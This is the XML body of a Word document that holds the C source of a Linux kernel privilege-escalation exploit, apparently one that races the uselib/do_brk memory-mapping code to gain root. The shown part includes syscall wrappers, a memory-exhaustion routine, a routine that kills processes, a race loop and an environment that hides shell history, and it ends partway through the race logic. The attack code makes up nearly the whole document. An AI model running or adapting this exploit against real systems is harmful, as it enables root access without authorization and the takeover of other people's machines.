    <w:p w14:paraId="39BB689B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A8D5C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extern char **environ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E1A79" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EA4C0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char cstack[STACK_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172971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char name[TMPLEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BD15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char line[TMPLEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B7523" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16099AD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pid_t consume_pid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09858C10" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635AFB8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volatile int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F7ED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al = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34611AE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go = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51D6E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inish = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD29B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cnt = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202713C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cnt=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D694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delta = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D331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delta_max = RACEDELTA,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0DF92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flags = PROT_WRITE|PROT_READ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D5544" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335CFFB3" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CA426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int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761609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stop=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3B3D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lent=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D7D67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idx,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A668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num=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BE25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mp_max=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2538192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mp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7428A67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ime=2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686BB6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pid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D15E9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uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402611A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task_size,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80353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old_esp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486815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lib_addr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771D5BF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count=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F1A9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base=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C856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addr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E672C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addr_min,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDCBC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addr_max,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10685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ma_start,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197EB40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ma_end,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD711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x_page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60798069" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3040274B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2830385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struct timeval tm1, tm2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE687A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412AE85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char *myenv[] = {"TERM=vt100",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620FBA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HISTFILE=/dev/null",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63BEB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ULL};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F975189" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1FC85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char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54933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x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0328B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBFD3B1" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3628F4E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char *pagemap, *libname=LIBNAME, *shellname=SHELL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49412D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015638B6" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CA5E07" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6586306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_NR_sys_gettimeofday</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_gettimeofday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC8A8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_NR_sys_sched_yield</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_sched_yield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B617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_NR_sys_madvise</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_madvise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B6045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_NR_sys_uselib</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_uselib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0703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_NR_sys_mmap2</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_mmap2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166DD14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_NR_sys_munmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_munmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01C4A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_NR_sys_mprotect</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_mprotect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E298F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define __NR_sys_mremap</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>__NR_mremap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413AC40" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C3EFA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6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD18A2" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B36BF3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5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E527BF2" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D69BA0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3(int, sys_madvise, void*, a, int, b, int, c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C123A1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3(int, sys_mprotect, int, a, int, b, int, c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C64B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3( int, modify_ldt, int, func, void *, ptr, int, bytecount );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C1B0AD" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA3CD0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2(int, sys_gettimeofday, void*, a, void*, b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCE91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2(int, sys_munmap, int, a, int, b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86307A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FEA98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1(int, sys_uselib, char*, l);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAD84A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0881D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_syscall0(void, sys_sched_yield);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69478D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEAEC8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317FC32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consume_memory()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E115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529C51E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truct sysinfo info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200060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har *vmem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F524D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p>
    <w:p w14:paraId="08926F0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ysinfo(&amp;info);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BAE24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mem = malloc(info.freeram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408752C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 (vmem == NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F4A6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0855138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error("malloc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBD76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return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E423D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79401EF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emset(vmem, 0x90, info.freeram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF0A91F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A94D75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B16E11A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C685E0" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260ABDA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int tmdiff(struct timeval *t1, struct timeval *t2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519F93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5079CAF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r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CD486" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4922149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t2-&gt;tv_sec - t1-&gt;tv_sec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D8F2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1000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE95C8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t2-&gt;tv_usec - t1-&gt;tv_usec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45906C7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return r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D992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90A1090" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222A4D84" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEC755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fatal(const char *message, int critical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495DF01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33D023E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sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF342E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2381B6E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errno) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253A9B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fprintf(stdout, "\n[-] FAILED: %s ", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA2C8D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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FFC78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fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095932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char*) (strerror(errno)) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C141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0CDBA20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critical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3C10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nCRITICAL, entering endless loop");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72201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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146ACD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flush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F615F56" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05935F0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unlink(libname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B161E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kill(cpid, SIGKILL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05333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or(;;) kill(0, sig);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A47C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22EF9D3C" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6FC121" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2350E54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try to race do_brk sleeping on kmalloc, may need modification for SMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717854D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raceme(void* v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305CA97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6DDDBB0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inish=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5DE1D9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AE32E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or(;;) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE37F2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errno = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25915CE6" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A5AEB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check if raced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C36B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recheck:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BBF9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go) sys_sched_yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49326EE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ys_gettimeofday(&amp;tm2, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED58CB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delta = tmdiff(&amp;tm1, &amp;tm2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5183BEB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smp_max &amp;&amp; delta &lt; (unsigned)delta_max) goto recheck;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639415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mp = smp_max;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C5091" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFB99B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check if lib VMAs exist as expected under race condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1145404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recheck2:</w:t>
      </w:r>
